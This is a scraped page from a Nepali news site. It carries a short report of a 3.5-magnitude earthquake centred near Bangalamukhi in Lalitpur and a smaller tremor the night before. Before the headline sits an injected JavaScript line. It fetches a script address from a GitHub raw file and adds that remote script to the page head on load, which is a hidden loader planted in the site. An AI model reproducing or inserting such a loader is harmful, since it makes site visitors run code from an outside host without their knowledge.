;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ललितपुरकाे बङ्गलामुखी केन्द्रबिन्दु भएर भूकम्पको धक्का – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ललितपुरकाे बङ्गलामुखी केन्द्रबिन्दु भएर भूकम्पको धक्का
समाचार

ललितपुरकाे बङ्गलामुखी केन्द्रबिन्दु भएर भूकम्पको धक्का

साउन २१,
ललितपुर । ललितपुरको बङ्गलामुखी आसपास केन्द्रबिन्दु भएर ३ दशमलव पाँच रेक्टर स्केलको भूकम्प गएको छ ।

बुधबार दिउँसो साढे ४ बजे भूकम्पकाे धक्का महसुस गरिएकाे भूकम्प मापन केन्द्रले जनाएको छ ।

मङ्गलबार राति ११.४० बजे पनि २ दशमलव ७ म्याग्निच्युडको भुइँचालो आएको थियो।

फेसबुक प्रतिक्रियाहरु